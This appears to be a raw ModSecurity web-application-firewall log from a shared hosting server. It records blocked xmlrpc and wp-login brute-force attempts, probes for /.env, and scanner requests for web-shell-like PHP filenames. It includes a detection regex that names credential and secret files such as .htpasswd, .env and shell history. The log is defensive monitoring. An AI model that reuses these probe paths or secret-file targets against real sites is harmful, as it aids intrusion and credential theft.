[Tue May 26 19:26:24.006944 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:38653] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiOzJzkdc0WtdrwtO2QAAAKU"]
[Tue May 26 19:26:24.377891 2026] [security2:error] [pid 49598:tid 49854] [client 176.65.139.231:28516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cercledepdy.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWmiOzJzkdc0WtdrwtO5AAAAQM"]
[Tue May 26 19:26:24.785220 2026] [security2:error] [pid 49598:tid 49737] [client 91.245.236.124:51821] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiOzJzkdc0WtdrwtO9QAAAI4"]
[Tue May 26 19:26:24.785315 2026] [security2:error] [pid 49598:tid 49737] [client 91.245.236.124:51821] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiOzJzkdc0WtdrwtO9QAAAI4"]
[Tue May 26 19:26:24.815662 2026] [security2:error] [pid 49598:tid 49753] [client 176.65.139.234:45956] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "adityacreations.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWmiOzJzkdc0WtdrwtO-AAAAJ4"]
[Tue May 26 19:26:25.054982 2026] [security2:error] [pid 49598:tid 49720] [remote 54.36.102.244:51040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmiOzJzkdc0WtdrwtO-wAA23k"]
[Tue May 26 19:26:25.409917 2026] [security2:error] [pid 49598:tid 49801] [client 20.192.3.167:6088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/inputs.php"] [unique_id "ahWmiezJzkdc0WtdrwtPFQAAAM4"]
[Tue May 26 19:26:25.551569 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:62945] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiezJzkdc0WtdrwtPHgAAAP8"]
[Tue May 26 19:26:25.551717 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:62945] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiezJzkdc0WtdrwtPHgAAAP8"]
[Tue May 26 19:26:25.681877 2026] [security2:error] [pid 49598:tid 49788] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmiezJzkdc0WtdrwtPCwAAAME"]
[Tue May 26 19:26:26.318505 2026] [security2:error] [pid 49598:tid 49780] [client 91.245.236.124:55993] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiuzJzkdc0WtdrwtPQQAAALk"]
[Tue May 26 19:26:26.318670 2026] [security2:error] [pid 49598:tid 49780] [client 91.245.236.124:55993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmiuzJzkdc0WtdrwtPQQAAALk"]
[Tue May 26 19:26:26.424371 2026] [security2:error] [pid 49598:tid 49799] [client 20.192.3.167:14496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/item.php"] [unique_id "ahWmiuzJzkdc0WtdrwtPRwAAAMw"]
[Tue May 26 19:26:26.472770 2026] [security2:error] [pid 49598:tid 49812] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmiuzJzkdc0WtdrwtPMQAAANk"]
[Tue May 26 19:26:26.704192 2026] [security2:error] [pid 49598:tid 49784] [client 87.2.131.248:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmiuzJzkdc0WtdrwtPQAAAAL0"]
[Tue May 26 19:26:27.093979 2026] [security2:error] [pid 49598:tid 49796] [client 91.245.236.124:60931] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmi-zJzkdc0WtdrwtPYwAAAMk"]
[Tue May 26 19:26:27.094085 2026] [security2:error] [pid 49598:tid 49796] [client 91.245.236.124:60931] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmi-zJzkdc0WtdrwtPYwAAAMk"]
[Tue May 26 19:26:27.613804 2026] [security2:error] [pid 49598:tid 49754] [client 20.192.3.167:10974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/k.php"] [unique_id "ahWmi-zJzkdc0WtdrwtPfAAAAJ8"]
[Tue May 26 19:26:27.858986 2026] [security2:error] [pid 49598:tid 49771] [client 91.245.236.124:18383] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmi-zJzkdc0WtdrwtPigAAALA"]
[Tue May 26 19:26:27.859128 2026] [security2:error] [pid 49598:tid 49771] [client 91.245.236.124:18383] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmi-zJzkdc0WtdrwtPigAAALA"]
[Tue May 26 19:26:27.998017 2026] [security2:error] [pid 49598:tid 49809] [client 152.239.113.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWmi-zJzkdc0WtdrwtPhgAAANY"]
[Tue May 26 19:26:28.180159 2026] [security2:error] [pid 49598:tid 49616] [remote 176.31.139.11:44888] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.acacia.org.in"] [uri "/robots.txt"] [unique_id "ahWmjOzJzkdc0WtdrwtPkQAA1xE"]
[Tue May 26 19:26:28.180387 2026] [security2:error] [pid 49598:tid 49810] [client 176.31.139.11:44888] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acacia.org.in"] [uri "/robots.txt"] [unique_id "ahWmjOzJzkdc0WtdrwtPkQAA1xE"]
[Tue May 26 19:26:28.505298 2026] [security2:error] [pid 49598:tid 49745] [client 152.239.113.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWmjOzJzkdc0WtdrwtPlAAAAJY"]
[Tue May 26 19:26:28.536738 2026] [security2:error] [pid 49598:tid 49722] [remote 178.156.182.155:42086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWmjOzJzkdc0WtdrwtPlQAAtXs"]
[Tue May 26 19:26:28.545247 2026] [security2:error] [pid 49598:tid 49741] [client 20.192.3.167:14024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/license.php"] [unique_id "ahWmjOzJzkdc0WtdrwtPmQAAAJI"]
[Tue May 26 19:26:28.641049 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:30765] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjOzJzkdc0WtdrwtPoQAAAN0"]
[Tue May 26 19:26:28.641158 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:30765] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjOzJzkdc0WtdrwtPoQAAAN0"]
[Tue May 26 19:26:28.742649 2026] [security2:error] [pid 49598:tid 49813] [client 176.65.139.232:30802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "api.dezka.mx"] [uri "/.env"] [unique_id "ahWmjOzJzkdc0WtdrwtPogAAANo"]
[Tue May 26 19:26:29.391092 2026] [security2:error] [pid 49598:tid 49763] [client 167.94.146.52:22660] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.deeigo.com"] [uri "/public/index.php"] [unique_id "ahWmjezJzkdc0WtdrwtPsgAAAKg"]
[Tue May 26 19:26:29.417218 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:57557] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjezJzkdc0WtdrwtPswAAAKw"]
[Tue May 26 19:26:29.417325 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:57557] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjezJzkdc0WtdrwtPswAAAKw"]
[Tue May 26 19:26:29.490473 2026] [security2:error] [pid 49598:tid 49852] [client 20.192.3.167:14738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/load.php"] [unique_id "ahWmjezJzkdc0WtdrwtPugAAAQE"]
[Tue May 26 19:26:29.555282 2026] [security2:error] [pid 49598:tid 49732] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmjezJzkdc0WtdrwtPrgAAAIk"]
[Tue May 26 19:26:29.776457 2026] [security2:error] [pid 49598:tid 49636] [remote 54.39.0.110:60682] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.acacia.org.in"] [uri "/"] [unique_id "ahWmjezJzkdc0WtdrwtPvwAA6yU"]
[Tue May 26 19:26:29.776685 2026] [security2:error] [pid 49598:tid 49830] [client 54.39.0.110:60682] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.acacia.org.in"] [uri "/"] [unique_id "ahWmjezJzkdc0WtdrwtPvwAA6yU"]
[Tue May 26 19:26:29.926022 2026] [security2:error] [pid 49598:tid 49619] [remote 41.111.171.131:60828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.171.111.41.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmjezJzkdc0WtdrwtPvgAA2xQ"]
[Tue May 26 19:26:30.179987 2026] [security2:error] [pid 49598:tid 49764] [client 91.245.236.124:22059] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjuzJzkdc0WtdrwtPyQAAAKk"]
[Tue May 26 19:26:30.180113 2026] [security2:error] [pid 49598:tid 49764] [client 91.245.236.124:22059] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjuzJzkdc0WtdrwtPyQAAAKk"]
[Tue May 26 19:26:30.511693 2026] [security2:error] [pid 49598:tid 49798] [client 20.192.3.167:10861] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/manager.php"] [unique_id "ahWmjuzJzkdc0WtdrwtP0wAAAMs"]
[Tue May 26 19:26:30.944470 2026] [security2:error] [pid 49598:tid 49741] [client 91.245.236.124:16509] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjuzJzkdc0WtdrwtP4QAAAJI"]
[Tue May 26 19:26:30.944563 2026] [security2:error] [pid 49598:tid 49741] [client 91.245.236.124:16509] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmjuzJzkdc0WtdrwtP4QAAAJI"]
[Tue May 26 19:26:31.454736 2026] [security2:error] [pid 49598:tid 49780] [client 20.192.3.167:8723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/media.php"] [unique_id "ahWmj-zJzkdc0WtdrwtP7wAAALk"]
[Tue May 26 19:26:31.709683 2026] [security2:error] [pid 49598:tid 49796] [client 91.245.236.124:22199] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmj-zJzkdc0WtdrwtP8AAAAMk"]
[Tue May 26 19:26:31.709824 2026] [security2:error] [pid 49598:tid 49796] [client 91.245.236.124:22199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmj-zJzkdc0WtdrwtP8AAAAMk"]
[Tue May 26 19:26:31.780224 2026] [security2:error] [pid 49598:tid 49638] [remote 216.73.216.30:44073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWmj-zJzkdc0WtdrwtP9AAA7ic"]
[Tue May 26 19:26:31.832738 2026] [security2:error] [pid 49598:tid 49812] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmj-zJzkdc0WtdrwtP7gAAANk"]
[Tue May 26 19:26:32.410759 2026] [security2:error] [pid 49598:tid 49640] [remote 74.7.241.58:42090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWmkOzJzkdc0WtdrwtQDAAAxCk"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/woocommerce/templates/cart
[Tue May 26 19:26:32.485534 2026] [security2:error] [pid 49598:tid 49731] [client 20.192.3.167:5825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/mar.php"] [unique_id "ahWmkOzJzkdc0WtdrwtQEQAAAIg"]
[Tue May 26 19:26:32.487444 2026] [security2:error] [pid 49598:tid 49822] [client 91.245.236.124:12111] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkOzJzkdc0WtdrwtQEAAAAOM"]
[Tue May 26 19:26:32.487567 2026] [security2:error] [pid 49598:tid 49822] [client 91.245.236.124:12111] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkOzJzkdc0WtdrwtQEAAAAOM"]
[Tue May 26 19:26:33.195998 2026] [security2:error] [pid 49598:tid 49628] [remote 208.109.188.137:34894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWmkezJzkdc0WtdrwtQIQAA-B0"]
[Tue May 26 19:26:33.246930 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:50009] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkezJzkdc0WtdrwtQIgAAAOI"]
[Tue May 26 19:26:33.247057 2026] [security2:error] [pid 49598:tid 49821] [client 91.245.236.124:50009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkezJzkdc0WtdrwtQIgAAAOI"]
[Tue May 26 19:26:33.488554 2026] [security2:error] [pid 49598:tid 49737] [client 20.192.3.167:8246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/my1.php"] [unique_id "ahWmkezJzkdc0WtdrwtQLAAAAI4"]
[Tue May 26 19:26:34.023442 2026] [security2:error] [pid 49598:tid 49829] [client 91.245.236.124:37001] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkuzJzkdc0WtdrwtQPAAAAOo"]
[Tue May 26 19:26:34.023639 2026] [security2:error] [pid 49598:tid 49829] [client 91.245.236.124:37001] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkuzJzkdc0WtdrwtQPAAAAOo"]
[Tue May 26 19:26:34.126831 2026] [security2:error] [pid 49598:tid 49801] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmkezJzkdc0WtdrwtQNgAAAM4"]
[Tue May 26 19:26:34.405508 2026] [security2:error] [pid 49598:tid 49791] [client 20.192.3.167:14507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/mm.php"] [unique_id "ahWmkuzJzkdc0WtdrwtQSAAAAMQ"]
[Tue May 26 19:26:34.783942 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:33815] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkuzJzkdc0WtdrwtQVQAAALM"]
[Tue May 26 19:26:34.784051 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:33815] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmkuzJzkdc0WtdrwtQVQAAALM"]
[Tue May 26 19:26:35.469869 2026] [security2:error] [pid 49598:tid 49779] [client 20.192.3.167:14238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/network.php"] [unique_id "ahWmk-zJzkdc0WtdrwtQcgAAALg"]
[Tue May 26 19:26:35.513200 2026] [security2:error] [pid 49598:tid 49754] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmk-zJzkdc0WtdrwtQZwAAAJ8"]
[Tue May 26 19:26:35.552725 2026] [security2:error] [pid 49598:tid 49743] [client 91.245.236.124:29279] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmk-zJzkdc0WtdrwtQdgAAAJQ"]
